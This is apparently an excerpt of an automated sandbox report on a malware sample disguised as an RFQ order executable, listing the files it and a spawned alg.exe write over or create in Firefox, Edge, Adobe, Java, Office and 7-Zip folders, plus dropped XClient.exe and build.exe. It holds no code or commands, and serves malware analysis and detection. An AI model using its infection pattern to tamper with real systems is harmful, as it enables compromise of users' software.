Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to behavior

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedgewebview2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\BHO\ie_to_edge_stub.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedgewebview2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_pwa_launcher.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe			Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	System file written: C:\Windows\System32\AppVClient.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_proxy.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_proxy.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\notification_click_helper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe			Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE			Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	System file written: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_pwa_launcher.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\Installer\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	System file written: C:\Windows\System32\alg.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\cookie_exporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\Installer\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\BHO\ie_to_edge_stub.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\pwahelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\elevation_service.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\cookie_exporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\notification_helper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\pwahelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\identity_helper.exe			Jump to behavior

Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedgewebview2.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\BHO\ie_to_edge_stub.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedgewebview2.exe			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\XClient.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_pwa_launcher.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\build.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7z.exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe			Jump to dropped file
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File created: C:\Windows\System32\AppVClient.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zG.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_proxy.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_proxy.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\notification_click_helper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe			Jump to dropped file
